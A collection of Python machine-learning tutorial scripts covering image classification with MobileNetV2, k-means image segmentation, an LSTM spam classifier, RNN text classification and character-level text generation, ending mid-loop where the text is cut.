# get a random batch of images
image_batch, label_batch = next(iter(validation_generator))
# turn the original one-hot labels into human-readable text
label_batch = [class_names[np.argmax(label_batch[i])] for i in range(batch_size)]
# predict the images on the model
predicted_class_names = model.predict(image_batch)
predicted_ids = [np.argmax(predicted_class_names[i]) for i in range(batch_size)]
# turn the predicted vectors to human readable labels
predicted_class_names = np.array([class_names[id] for id in predicted_ids])
# some nice plotting: 30 thumbnails in a 6x5 grid
plt.figure(figsize=(10,9))
for n in range(30):
    plt.subplot(6,5,n+1)
    plt.subplots_adjust(hspace = 0.3)
    plt.imshow(image_batch[n])
    if predicted_class_names[n] == label_batch[n]:
        color = "blue"
        title = predicted_class_names[n].title()
    else:
        color = "red"
        title = f"{predicted_class_names[n].title()}, correct:{label_batch[n]}"
    plt.title(title, color=color)
    plt.axis('off')
_ = plt.suptitle("Model predictions (blue: correct, red: incorrect)")
plt.show()
import tensorflow as tf
from keras.models import Model
from keras.applications import MobileNetV2, ResNet50, InceptionV3 # try to use them and see which is better
from keras.layers import Dense
from keras.callbacks import ModelCheckpoint, TensorBoard
from keras.utils import get_file
from keras.preprocessing.image import ImageDataGenerator
import os
import pathlib
import numpy as np
# samples per gradient update
batch_size = 32
# five flower categories in the dataset
num_classes = 5
# number of training epochs
epochs = 10
# input size expected by MobileNetV2 (height, width, channels)
IMAGE_SHAPE = (224, 224, 3)
def load_data():
    """This function downloads, extracts, loads, normalizes and one-hot encodes Flower Photos dataset.

    Returns (train_data_gen, test_data_gen, CLASS_NAMES): an 80/20
    train/validation pair of Keras directory iterators plus the array of
    class (folder) names.
    """
    # download the dataset and extract it
    data_dir = get_file(origin='https://storage.googleapis.com/download.tensorflow.org/example_images/flower_photos.tgz',
                        fname='flower_photos', untar=True)
    data_dir = pathlib.Path(data_dir)
    # count how many images are there
    image_count = len(list(data_dir.glob('*/*.jpg')))
    print("Number of images:", image_count)
    # get all classes for this dataset (types of flowers) excluding LICENSE file
    CLASS_NAMES = np.array([item.name for item in data_dir.glob('*') if item.name != "LICENSE.txt"])
    # roses = list(data_dir.glob('roses/*'))
    # 20% validation set 80% training set; pixel values rescaled to [0, 1]
    image_generator = ImageDataGenerator(rescale=1/255, validation_split=0.2)
    # make the training dataset generator
    train_data_gen = image_generator.flow_from_directory(directory=str(data_dir), batch_size=batch_size,
                                                         classes=list(CLASS_NAMES), target_size=(IMAGE_SHAPE[0], IMAGE_SHAPE[1]),
                                                         shuffle=True, subset="training")
    # make the validation dataset generator
    test_data_gen = image_generator.flow_from_directory(directory=str(data_dir), batch_size=batch_size,
                                                        classes=list(CLASS_NAMES), target_size=(IMAGE_SHAPE[0], IMAGE_SHAPE[1]),
                                                        shuffle=True, subset="validation")
    return train_data_gen, test_data_gen, CLASS_NAMES
def create_model(input_shape):
    """
    Build a transfer-learning classifier on top of MobileNetV2.

    Freezes all but the last 4 layers, replaces the head with a
    `num_classes`-way softmax, and returns the compiled model.
    """
    # load MobileNetV2
    model = MobileNetV2(input_shape=input_shape)
    # remove the last fully connected layer
    # NOTE(review): layers.pop() on a functional keras model may not
    # rewire the graph on all Keras/TF versions -- confirm the head is
    # actually replaced rather than appended after the original softmax
    model.layers.pop()
    # freeze all the weights of the model except the last 4 layers
    for layer in model.layers[:-4]:
        layer.trainable = False
    # construct our own fully connected layer for classification
    output = Dense(num_classes, activation="softmax")
    # connect that dense layer to the model
    output = output(model.layers[-1].output)
    model = Model(inputs=model.inputs, outputs=output)
    # print the summary of the model architecture
    model.summary()
    # training the model using rmsprop optimizer
    model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
    return model
# Training entry point: build the transfer-learning model and train it
# with TensorBoard logging and best-checkpoint saving.
if __name__ == "__main__":
    # load the data generators
    train_generator, validation_generator, class_names = load_data()
    # constructs the model
    model = create_model(input_shape=IMAGE_SHAPE)
    # model name
    model_name = "MobileNetV2_finetune_last5"
    # some nice callbacks
    tensorboard = TensorBoard(log_dir=f"logs/{model_name}")
    # NOTE(review): the "val_acc" key in the filename template is the old
    # Keras metric name; newer versions report "val_accuracy" -- confirm
    checkpoint = ModelCheckpoint(f"results/{model_name}" + "-loss-{val_loss:.2f}-acc-{val_acc:.2f}.h5",
                                 save_best_only=True,
                                 verbose=1)
    # make sure results folder exist
    if not os.path.isdir("results"):
        os.mkdir("results")
    # count number of steps per epoch
    training_steps_per_epoch = np.ceil(train_generator.samples / batch_size)
    validation_steps_per_epoch = np.ceil(validation_generator.samples / batch_size)
    # train using the generators
    model.fit_generator(train_generator, steps_per_epoch=training_steps_per_epoch,
                        validation_data=validation_generator, validation_steps=validation_steps_per_epoch,
                        epochs=epochs, verbose=1, callbacks=[tensorboard, checkpoint])
import cv2
import numpy as np
import matplotlib.pyplot as plt
import sys
# Segment the image given as argv[1] into k color clusters with
# cv2.kmeans, show the result, then mask out one cluster.
# read the image
image = cv2.imread(sys.argv[1])
# convert to RGB
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# reshape the image to a 2D array of pixels and 3 color values (RGB)
pixel_values = image.reshape((-1, 3))
# convert to float (cv2.kmeans requires float32 input)
pixel_values = np.float32(pixel_values)
# define stopping criteria (max 100 iterations or epsilon 0.2)
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 100, 0.2)
# number of clusters (K)
k = 3
compactness, labels, (centers) = cv2.kmeans(pixel_values, k, None, criteria, 10, cv2.KMEANS_RANDOM_CENTERS)
# convert back to 8 bit values
centers = np.uint8(centers)
# flatten the labels array
labels = labels.flatten()
# convert all pixels to the color of the centroids
segmented_image = centers[labels]
# reshape back to the original image dimension
segmented_image = segmented_image.reshape(image.shape)
# show the image
plt.imshow(segmented_image)
plt.show()
# disable only the cluster number 2 (turn the pixel into black)
masked_image = np.copy(image)
# convert to the shape of a vector of pixel values
masked_image = masked_image.reshape((-1, 3))
# color (i.e cluster) to disable
cluster = 2
masked_image[labels == cluster] = [0, 0, 0]
# convert back to original shape
masked_image = masked_image.reshape(image.shape)
# show the image
plt.imshow(masked_image)
plt.show()
import cv2
import numpy as np
# Live k-means color segmentation of the webcam feed; press 'q' to quit.
cap = cv2.VideoCapture(0)
k = 5
# define stopping criteria (max 100 iterations or epsilon 0.2)
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 100, 0.2)
while True:
    # read the image
    _, image = cap.read()
    # reshape the image to a 2D array of pixels and 3 color values (RGB)
    pixel_values = image.reshape((-1, 3))
    # convert to float (cv2.kmeans requires float32 input)
    pixel_values = np.float32(pixel_values)
    # number of clusters (K)
    _, labels, (centers) = cv2.kmeans(pixel_values, k, None, criteria, 10, cv2.KMEANS_RANDOM_CENTERS)
    # convert back to 8 bit values
    centers = np.uint8(centers)
    # convert all pixels to the color of the centroids
    segmented_image = centers[labels.flatten()]
    # reshape back to the original image dimension
    segmented_image = segmented_image.reshape(image.shape)
    # reshape labels too
    labels = labels.reshape(image.shape[0], image.shape[1])
    cv2.imshow("segmented_image", segmented_image)
    # visualize each segment
    if cv2.waitKey(1) == ord("q"):
        break
cap.release()
cv2.destroyAllWindows()
# to use CPU uncomment below code
# import os
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=5,
# inter_op_parallelism_threads=5,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.utils import to_categorical
from keras.callbacks import ModelCheckpoint, TensorBoard
from sklearn.model_selection import train_test_split
import time
import numpy as np
import pickle
from utils import get_embedding_vectors, get_model, SEQUENCE_LENGTH, EMBEDDING_SIZE, TEST_SIZE
from utils import BATCH_SIZE, EPOCHS, int2label, label2int
def load_data(path="data/SMSSpamCollection"):
    """
    Loads the SMS Spam Collection dataset.

    Each line is "<label><whitespace><message>"; the first token is the
    label ("ham"/"spam"), the rest is the message text.

    :param path: dataset file to read (defaults to the bundled location,
                 keeping the original no-argument call working)
    :return: tuple (texts, labels) of parallel lists
    """
    texts, labels = [], []
    with open(path, encoding="utf-8") as f:
        for line in f:
            split = line.split()
            if not split:
                # skip blank lines instead of crashing on split[0]
                continue
            labels.append(split[0].strip())
            texts.append(' '.join(split[1:]).strip())
    return texts, labels
# ---- spam classifier training script: tokenize, pad, train, evaluate ----
# load the data
X, y = load_data()
# Text tokenization
# vectorizing text, turning each text into sequence of integers
tokenizer = Tokenizer()
tokenizer.fit_on_texts(X)
# lets dump it to a file, so we can use it in testing
pickle.dump(tokenizer, open("results/tokenizer.pickle", "wb"))
# convert to sequence of integers
X = tokenizer.texts_to_sequences(X)
print(X[0])
# convert to numpy arrays
X = np.array(X)
y = np.array(y)
# pad sequences at the beginning of each sequence with 0's
# for example if SEQUENCE_LENGTH=4:
# [[5, 3, 2], [5, 1, 2, 3], [3, 4]]
# will be transformed to:
# [[0, 5, 3, 2], [5, 1, 2, 3], [0, 0, 3, 4]]
X = pad_sequences(X, maxlen=SEQUENCE_LENGTH)
print(X[0])
# One Hot encoding labels
# [spam, ham, spam, ham, ham] will be converted to:
# [1, 0, 1, 0, 1] and then to:
# [[0, 1], [1, 0], [0, 1], [1, 0], [0, 1]]
y = [ label2int[label] for label in y ]
y = to_categorical(y)
print(y[0])
# split and shuffle
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=TEST_SIZE, random_state=7)
# constructs the model with 128 LSTM units
model = get_model(tokenizer=tokenizer, lstm_units=128)
# initialize our ModelCheckpoint and TensorBoard callbacks
# model checkpoint for saving best weights
model_checkpoint = ModelCheckpoint("results/spam_classifier_{val_loss:.2f}", save_best_only=True,
                                    verbose=1)
# for better visualization
tensorboard = TensorBoard(f"logs/spam_classifier_{time.time()}")
# print our data shapes
print("X_train.shape:", X_train.shape)
print("X_test.shape:", X_test.shape)
print("y_train.shape:", y_train.shape)
print("y_test.shape:", y_test.shape)
# train the model
model.fit(X_train, y_train, validation_data=(X_test, y_test),
          batch_size=BATCH_SIZE, epochs=EPOCHS,
          callbacks=[tensorboard, model_checkpoint],
          verbose=1)
# get the loss and metrics
result = model.evaluate(X_test, y_test)
# extract those
loss = result[0]
accuracy = result[1]
precision = result[2]
recall = result[3]
print(f"[+] Accuracy: {accuracy*100:.2f}%")
print(f"[+] Precision: {precision*100:.2f}%")
print(f"[+] Recall: {recall*100:.2f}%")
import os
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=5,
# inter_op_parallelism_threads=5,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
from utils import get_model, int2label, label2int
from keras.preprocessing.sequence import pad_sequences
import pickle
import numpy as np
# maximum tokens per message; must match the value used at training time
SEQUENCE_LENGTH = 100
# get the tokenizer
tokenizer = pickle.load(open("results/tokenizer.pickle", "rb"))
# rebuild the architecture, then restore the trained weights
model = get_model(tokenizer, 128)
model.load_weights("results/spam_classifier_0.05")
def get_predictions(text):
    """Classify *text* with the loaded spam model; returns 'ham' or 'spam'."""
    # tokenize and left-pad to the fixed training length
    seq = pad_sequences(tokenizer.texts_to_sequences([text]), maxlen=SEQUENCE_LENGTH)
    # softmax probabilities over the two classes
    probs = model.predict(seq)[0]
    # map the argmax class id back to its string label
    return int2label[np.argmax(probs)]
# interactive loop: classify messages typed by the user until interrupted
while True:
    text = input("Enter the mail:")
    # convert to sequences
    print(get_predictions(text))
import tqdm
import numpy as np
from keras.preprocessing.sequence import pad_sequences
from keras.layers import Embedding, LSTM, Dropout, Dense
from keras.models import Sequential
import keras_metrics
SEQUENCE_LENGTH = 100 # the length of all sequences (number of words per sample)
EMBEDDING_SIZE = 100  # Using 100-Dimensional GloVe embedding vectors
TEST_SIZE = 0.25 # ratio of testing set
BATCH_SIZE = 64
EPOCHS = 20 # number of epochs
# mappings between the string labels and their integer class ids
label2int = {"ham": 0, "spam": 1}
int2label = {0: "ham", 1: "spam"}
def get_embedding_vectors(tokenizer, dim=100):
    """Build the embedding matrix for the tokenizer vocabulary from GloVe.

    Reads data/glove.6B.<dim>d.txt; rows are indexed by the tokenizer word
    ids, and words missing from GloVe keep all-zero rows.
    """
    embedding_index = {}
    with open(f"data/glove.6B.{dim}d.txt", encoding='utf8') as f:
        for line in tqdm.tqdm(f, "Reading GloVe"):
            values = line.split()
            # first token is the word, the rest are its vector components
            word = values[0]
            vectors = np.asarray(values[1:], dtype='float32')
            embedding_index[word] = vectors
    word_index = tokenizer.word_index
    # we do +1 because Tokenizer() starts from 1
    embedding_matrix = np.zeros((len(word_index)+1, dim))
    for word, i in word_index.items():
        embedding_vector = embedding_index.get(word)
        if embedding_vector is not None:
            # words not found will be 0s
            embedding_matrix[i] = embedding_vector
    return embedding_matrix
def get_model(tokenizer, lstm_units):
    """
    Constructs the model,
    Embedding vectors => LSTM => 2 output Fully-Connected neurons with softmax activation

    :param tokenizer: fitted Keras Tokenizer (word_index sizes the embedding)
    :param lstm_units: number of units in the LSTM layer
    :return: a compiled Sequential model
    """
    # get the GloVe embedding vectors
    embedding_matrix = get_embedding_vectors(tokenizer)
    model = Sequential()
    # frozen (non-trainable) GloVe embedding layer
    model.add(Embedding(len(tokenizer.word_index)+1,
              EMBEDDING_SIZE,
              weights=[embedding_matrix],
              trainable=False,
              input_length=SEQUENCE_LENGTH))
    model.add(LSTM(lstm_units, recurrent_dropout=0.2))
    model.add(Dropout(0.3))
    model.add(Dense(2, activation="softmax"))
    # compile as rmsprop optimizer
    # aswell as with recall metric
    model.compile(optimizer="rmsprop", loss="categorical_crossentropy",
                  metrics=["accuracy", keras_metrics.precision(), keras_metrics.recall()])
    model.summary()
    return model
from tensorflow.keras.callbacks import TensorBoard
import os
from parameters import *
from utils import create_model, load_20_newsgroup_data
# create these folders if they does not exist
if not os.path.isdir("results"):
    os.mkdir("results")
if not os.path.isdir("logs"):
    os.mkdir("logs")
if not os.path.isdir("data"):
    os.mkdir("data")
# dataset name, IMDB movie reviews dataset
# NOTE(review): the comment above says IMDB, but this script trains on 20 newsgroups
dataset_name = "20_news_group"
# get the unique model name based on hyper parameters on parameters.py
model_name = get_model_name(dataset_name)
# load the data
data = load_20_newsgroup_data(N_WORDS, SEQUENCE_LENGTH, TEST_SIZE, oov_token=OOV_TOKEN)
# build the RNN classifier from the hyperparameters declared in parameters.py
model = create_model(data["tokenizer"].word_index, units=UNITS, n_layers=N_LAYERS,
                    cell=RNN_CELL, bidirectional=IS_BIDIRECTIONAL, embedding_size=EMBEDDING_SIZE,
                    sequence_length=SEQUENCE_LENGTH, dropout=DROPOUT,
                    loss=LOSS, optimizer=OPTIMIZER, output_length=data["y_train"][0].shape[0])
model.summary()
# log training metrics to TensorBoard under a per-model directory
tensorboard = TensorBoard(log_dir=os.path.join("logs", model_name))
history = model.fit(data["X_train"], data["y_train"],
                    batch_size=BATCH_SIZE,
                    epochs=EPOCHS,
                    validation_data=(data["X_test"], data["y_test"]),
                    callbacks=[tensorboard],
                    verbose=1)
# persist the trained model
model.save(os.path.join("results", model_name) + ".h5")
from tensorflow.keras.layers import LSTM
# max number of words in each sentence
SEQUENCE_LENGTH = 300
# N-Dimensional GloVe embedding vectors
EMBEDDING_SIZE = 300
# number of words to use, discarding the rest
N_WORDS = 10000
# out of vocabulary token
OOV_TOKEN = None
# 30% testing set, 70% training set
TEST_SIZE = 0.3
# number of CELL layers
N_LAYERS = 1
# the RNN cell to use, LSTM in this case
RNN_CELL = LSTM
# whether it's a bidirectional RNN
IS_BIDIRECTIONAL = False
# number of units (RNN_CELL ,nodes) in each layer
UNITS = 128
# dropout rate
DROPOUT = 0.4
### Training parameters
LOSS = "categorical_crossentropy"
OPTIMIZER = "adam"
BATCH_SIZE = 64
# number of training epochs
EPOCHS = 6
def get_model_name(dataset_name):
    """Build the unique model identifier from the hyperparameters above."""
    name = (
        f"{dataset_name}-{RNN_CELL.__name__}-seq-{SEQUENCE_LENGTH}-em-{EMBEDDING_SIZE}"
        f"-w-{N_WORDS}-layers-{N_LAYERS}-units-{UNITS}-opt-{OPTIMIZER}"
        f"-BS-{BATCH_SIZE}-d-{DROPOUT}"
    )
    # prefix bidirectional runs so they sort together
    if IS_BIDIRECTIONAL:
        name = "bid-" + name
    # suffix runs that used an out-of-vocabulary token
    if OOV_TOKEN:
        name = name + "-oov"
    return name
from tensorflow.keras.callbacks import TensorBoard
import os
from parameters import *
from utils import create_model, load_imdb_data
# create these folders if they does not exist
if not os.path.isdir("results"):
    os.mkdir("results")
if not os.path.isdir("logs"):
    os.mkdir("logs")
if not os.path.isdir("data"):
    os.mkdir("data")
# dataset name, IMDB movie reviews dataset
dataset_name = "imdb"
# get the unique model name based on hyper parameters on parameters.py
model_name = get_model_name(dataset_name)
# load the data
data = load_imdb_data(N_WORDS, SEQUENCE_LENGTH, TEST_SIZE, oov_token=OOV_TOKEN)
# build the RNN classifier from the hyperparameters declared in parameters.py
model = create_model(data["tokenizer"].word_index, units=UNITS, n_layers=N_LAYERS,
                    cell=RNN_CELL, bidirectional=IS_BIDIRECTIONAL, embedding_size=EMBEDDING_SIZE,
                    sequence_length=SEQUENCE_LENGTH, dropout=DROPOUT,
                    loss=LOSS, optimizer=OPTIMIZER, output_length=data["y_train"][0].shape[0])
model.summary()
# log training metrics to TensorBoard under a per-model directory
tensorboard = TensorBoard(log_dir=os.path.join("logs", model_name))
history = model.fit(data["X_train"], data["y_train"],
                    batch_size=BATCH_SIZE,
                    epochs=EPOCHS,
                    validation_data=(data["X_test"], data["y_test"]),
                    callbacks=[tensorboard],
                    verbose=1)
# persist the trained model
model.save(os.path.join("results", model_name) + ".h5")
from tensorflow.keras.preprocessing.sequence import pad_sequences
import numpy as np
from parameters import *
from utils import create_model, load_20_newsgroup_data, load_imdb_data
import pickle
import os
# dataset name, IMDB movie reviews dataset
dataset_name = "imdb"
# get the unique model name based on hyper parameters on parameters.py
model_name = get_model_name(dataset_name)
# data = load_20_newsgroup_data(N_WORDS, SEQUENCE_LENGTH, TEST_SIZE, oov_token=OOV_TOKEN)
# rebuild the tokenizer/data exactly as in training so word ids line up
data = load_imdb_data(N_WORDS, SEQUENCE_LENGTH, TEST_SIZE, oov_token=OOV_TOKEN)
model = create_model(data["tokenizer"].word_index, units=UNITS, n_layers=N_LAYERS,
                    cell=RNN_CELL, bidirectional=IS_BIDIRECTIONAL, embedding_size=EMBEDDING_SIZE,
                    sequence_length=SEQUENCE_LENGTH, dropout=DROPOUT,
                    loss=LOSS, optimizer=OPTIMIZER, output_length=data["y_train"][0].shape[0])
# restore the trained weights saved by the training script
model.load_weights(os.path.join("results", f"{model_name}.h5"))
def get_predictions(text):
    """Return the predicted class label for *text* using the loaded model."""
    tok = data["tokenizer"]
    # tokenize, then pad to the model's fixed input length
    seq = pad_sequences(tok.texts_to_sequences([text]), maxlen=SEQUENCE_LENGTH)
    # softmax output over all classes
    probs = model.predict(seq)[0]
    print("output vector:", probs)
    # decode the argmax class id via the dataset's int->label mapping
    return data["int2label"][np.argmax(probs)]
# interactive loop: classify user-provided text until interrupted
while True:
    text = input("Enter your text: ")
    prediction = get_predictions(text)
    print("="*50)
    print("The class is:", prediction)
from tqdm import tqdm
import numpy as np
from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.layers import Dense, Dropout, LSTM, Embedding, Bidirectional
from tensorflow.keras.models import Sequential
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.utils import to_categorical
from sklearn.model_selection import train_test_split
from sklearn.datasets import fetch_20newsgroups
from glob import glob
import random
def get_embedding_vectors(word_index, embedding_size=100):
    """Return a (vocab_size+1, embedding_size) GloVe embedding matrix.

    Only words present in *word_index* are filled in; all other rows
    (including index 0, the padding id) stay zero.
    """
    embedding_matrix = np.zeros((len(word_index) + 1, embedding_size))
    with open(f"data/glove.6B.{embedding_size}d.txt", encoding="utf8") as f:
        for line in tqdm(f, "Reading GloVe"):
            values = line.split()
            # get the word as the first word in the line
            word = values[0]
            if word in word_index:
                idx = word_index[word]
                # get the vectors as the remaining values in the line
                embedding_matrix[idx] = np.array(values[1:], dtype="float32")
    return embedding_matrix
def create_model(word_index, units=128, n_layers=1, cell=LSTM, bidirectional=False,
                embedding_size=100, sequence_length=100, dropout=0.3,
                loss="categorical_crossentropy", optimizer="adam",
                output_length=2):
    """
    Constructs a RNN model given its parameters

    :param word_index: tokenizer word->id mapping; sizes the embedding table
    :param units: hidden units per recurrent layer
    :param n_layers: number of stacked recurrent layers
    :param cell: recurrent layer class (e.g. LSTM)
    :param bidirectional: wrap each recurrent layer in Bidirectional
    :param output_length: number of output classes
    :return: a compiled Sequential model
    """
    # get the frozen GloVe embedding weights
    embedding_matrix = get_embedding_vectors(word_index, embedding_size)
    model = Sequential()
    # add the embedding layer
    model.add(Embedding(len(word_index) + 1,
              embedding_size,
              weights=[embedding_matrix],
              trainable=False,
              input_length=sequence_length))
    for i in range(n_layers):
        if i == n_layers - 1:
            # last layer
            if bidirectional:
                model.add(Bidirectional(cell(units, return_sequences=False)))
            else:
                model.add(cell(units, return_sequences=False))
        else:
            # first layer or hidden layers
            if bidirectional:
                model.add(Bidirectional(cell(units, return_sequences=True)))
            else:
                model.add(cell(units, return_sequences=True))
        # dropout after every recurrent layer
        model.add(Dropout(dropout))
    model.add(Dense(output_length, activation="softmax"))
    # compile the model
    model.compile(optimizer=optimizer, loss=loss, metrics=["accuracy"])
    return model
def load_imdb_data(num_words, sequence_length, test_size=0.25, oov_token=None):
    """Load the IMDB reviews dataset from data/reviews.txt and data/labels.txt.

    Returns a dict with train/test splits, the fitted tokenizer and the
    label<->int mappings.
    """
    # read reviews
    reviews = []
    with open("data/reviews.txt") as f:
        for review in f:
            review = review.strip()
            reviews.append(review)
    labels = []
    with open("data/labels.txt") as f:
        for label in f:
            label = label.strip()
            labels.append(label)
    # tokenize the dataset corpus, delete uncommon words such as names, etc.
    tokenizer = Tokenizer(num_words=num_words, oov_token=oov_token)
    tokenizer.fit_on_texts(reviews)
    X = tokenizer.texts_to_sequences(reviews)
    # NOTE(review): X is a ragged list of lists, so np.array() yields an object
    # array; and to_categorical below needs integer labels — confirm labels.txt
    # stores 0/1 rather than the strings used in int2label
    X, y = np.array(X), np.array(labels)
    # pad sequences with 0's
    X = pad_sequences(X, maxlen=sequence_length)
    # convert labels to one-hot encoded
    y = to_categorical(y)
    # split data to training and testing sets
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_size, random_state=1)
    data = {}
    data["X_train"] = X_train
    data["X_test"]= X_test
    data["y_train"] = y_train
    data["y_test"] = y_test
    data["tokenizer"] = tokenizer
    data["int2label"] = {0: "negative", 1: "positive"}
    data["label2int"] = {"negative": 0, "positive": 1}
    return data
def load_20_newsgroup_data(num_words, sequence_length, test_size=0.25, oov_token=None):
    """Load and tokenize the 20 newsgroups corpus via scikit-learn.

    Returns a dict with train/test splits, the fitted tokenizer and the
    label<->int mappings derived from dataset.target_names.
    """
    # load the 20 news groups dataset
    # shuffling the data & removing each document's header, signature blocks and quotation blocks
    dataset = fetch_20newsgroups(subset="all", shuffle=True, remove=("headers", "footers", "quotes"))
    documents = dataset.data
    labels = dataset.target
    tokenizer = Tokenizer(num_words=num_words, oov_token=oov_token)
    tokenizer.fit_on_texts(documents)
    X = tokenizer.texts_to_sequences(documents)
    # NOTE(review): X is ragged, so np.array() produces an object array — confirm
    # this is tolerated by the installed numpy version
    X, y = np.array(X), np.array(labels)
    # pad sequences with 0's
    X = pad_sequences(X, maxlen=sequence_length)
    # convert labels to one-hot encoded
    y = to_categorical(y)
    # split data to training and testing sets
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_size, random_state=1)
    data = {}
    data["X_train"] = X_train
    data["X_test"]= X_test
    data["y_train"] = y_train
    data["y_test"] = y_test
    data["tokenizer"] = tokenizer
    data["int2label"] = { i: label for i, label in enumerate(dataset.target_names) }
    data["label2int"] = { label: i for i, label in enumerate(dataset.target_names) }
    return data
import numpy as np
import pickle
import tqdm
from keras.models import Sequential
from keras.layers import Dense, LSTM, Dropout, Activation
from keras.callbacks import ModelCheckpoint
# prompt the user to pick which trained model / vocabulary to load
message = """
Please choose which model you want to generate text with:
1 - Alice's wonderland
2 - Python Code
"""
choice = int(input(message))
assert choice == 1 or choice == 2
# load the char<->int vocabularies that match the chosen model
if choice == 1:
    char2int = pickle.load(open("data/wonderland-char2int.pickle", "rb"))
    int2char = pickle.load(open("data/wonderland-int2char.pickle", "rb"))
elif choice == 2:
    char2int = pickle.load(open("data/python-char2int.pickle", "rb"))
    int2char = pickle.load(open("data/python-int2char.pickle", "rb"))
# input window size (characters) and vocabulary size for the one-hot encoding
sequence_length = 100
n_unique_chars = len(char2int)
# building the model
model = Sequential([
    LSTM(256, input_shape=(sequence_length, n_unique_chars), return_sequences=True),
    Dropout(0.3),
    LSTM(256),
    Dense(n_unique_chars, activation="softmax"),
])
# restore the trained weights for the chosen corpus
if choice == 1:
    model.load_weights("results/wonderland-v2-0.75.h5")
elif choice == 2:
    model.load_weights("results/python-v2-0.30.h5")
seed = ""
print("Enter the seed, enter q to quit, maximum 100 characters:")
# collect multi-line seed text from the user until they type "q"
while True:
    result = input("")
    if result.lower() == "q":
        break
    seed += f"{result}\n"
seed = seed.lower()
n_chars = int(input("Enter number of characters you want to generate: "))
# generate 400 characters
generated = ""
for i in tqdm.tqdm(range(n_chars), "Generating text"):
    # make the input sequence
    X = np.zeros((1, sequence_length, n_unique_chars))
    # NOTE(review): characters absent from the training vocabulary raise KeyError here
    for t, char in enumerate(seed):
        X[0, (sequence_length - len(seed)) + t, char2int[char]] = 1
    # predict the next character
    predicted = model.predict(X, verbose=0)[0]
    # converting the vector to an integer
    next_index = np.argmax(predicted)
    # converting the integer to a character
    next_char = int2char[next_index]
    # add the character to results
    generated += next_char
    # shift seed and the predicted character
    seed = seed[1:] + next_char
print("Generated text:")
print(generated)
import tensorflow as tf
import numpy as np
import os
import pickle
# window size used when building training samples
SEQUENCE_LENGTH = 200
FILE_PATH = "data/python_code.py"
BASENAME = os.path.basename(FILE_PATH)
# read the whole corpus as one string
text = open(FILE_PATH).read()
n_chars = len(text)
# sorted set of unique characters = the model's vocabulary
vocab = ''.join(sorted(set(text)))
print("vocab:", vocab)
n_unique_chars = len(vocab)
print("Number of characters:", n_chars)
print("Number of unique characters:", n_unique_chars)
# dictionary that converts characters to integers
char2int = {c: i for i, c in enumerate(vocab)}
# dictionary that converts integers to characters
int2char = {i: c for i, c in enumerate(vocab)}
# save these dictionaries for later generation
pickle.dump(char2int, open(f"{BASENAME}-char2int.pickle", "wb"))
pickle.dump(int2char, open(f"{BASENAME}-int2char.pickle", "wb"))
# encode the corpus as an integer array
encoded_text = np.array([char2int[c] for c in text])
import tensorflow as tf
import numpy as np
import os
import pickle
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, LSTM, Dropout
from tensorflow.keras.callbacks import ModelCheckpoint
from string import punctuation
# --- corpus preparation for the char-level text generator ---
sequence_length = 100
BATCH_SIZE = 128
EPOCHS = 30
# dataset file path
FILE_PATH = "data/wonderland.txt"
# FILE_PATH = "data/python_code.py"
BASENAME = os.path.basename(FILE_PATH)
# commented because already downloaded
# import requests
# content = requests.get("http://www.gutenberg.org/cache/epub/11/pg11.txt").text
# open("data/wonderland.txt", "w", encoding="utf-8").write(content)
# read the data
text = open(FILE_PATH, encoding="utf-8").read()
# remove caps, comment this code if you want uppercase characters as well
text = text.lower()
# remove punctuation
text = text.translate(str.maketrans("", "", punctuation))
# print some stats
n_chars = len(text)
vocab = ''.join(sorted(set(text)))
print("unique_chars:", vocab)
n_unique_chars = len(vocab)
print("Number of characters:", n_chars)
print("Number of unique characters:", n_unique_chars)
# dictionary that converts characters to integers
char2int = {c: i for i, c in enumerate(vocab)}
# dictionary that converts integers to characters
int2char = {i: c for i, c in enumerate(vocab)}
# save these dictionaries for later generation
pickle.dump(char2int, open(f"{BASENAME}-char2int.pickle", "wb"))
pickle.dump(int2char, open(f"{BASENAME}-int2char.pickle", "wb"))
# convert all text into integers
encoded_text = np.array([char2int[c] for c in text])
# construct tf.data.Dataset object
char_dataset = tf.data.Dataset.from_tensor_slices(encoded_text)
# print first 5 characters
for char in char_dataset.take(5):
    print(char.numpy())
# build sequences by batching
sequences = char_dataset.batch(2*sequence_length + 1, drop_remainder=True)
def split_sample(sample):
    """Split one (2*seq_len+1)-char sample into many (input_window, next_char) pairs."""
    # first pair: the leading window and the character that follows it
    ds = tf.data.Dataset.from_tensors((sample[:sequence_length], sample[sequence_length]))
    for i in range(1, (len(sample)-1) // 2):
        # slide the window one character at a time
        input_ = sample[i: i+sequence_length]
        target = sample[i+sequence_length]
        other_ds = tf.data.Dataset.from_tensors((input_, target))
        ds = ds.concatenate(other_ds)
    return ds
def one_hot_samples(input_, target):
    # one-hot encode both the input window and the target character over the vocabulary
    return tf.one_hot(input_, n_unique_chars), tf.one_hot(target, n_unique_chars)
# build training samples eagerly: sliding windows over the raw text
sentences = []
y_train = []
for i in range(0, len(text) - sequence_length):
    sentences.append(text[i: i + sequence_length])
    y_train.append(text[i+sequence_length])
print("Number of sentences:", len(sentences))
# vectorization
X = np.zeros((len(sentences), sequence_length, n_unique_chars))
y = np.zeros((len(sentences), n_unique_chars))
for i, sentence in enumerate(sentences):
    for t, char in enumerate(sentence):
        # one-hot encode each character of the window
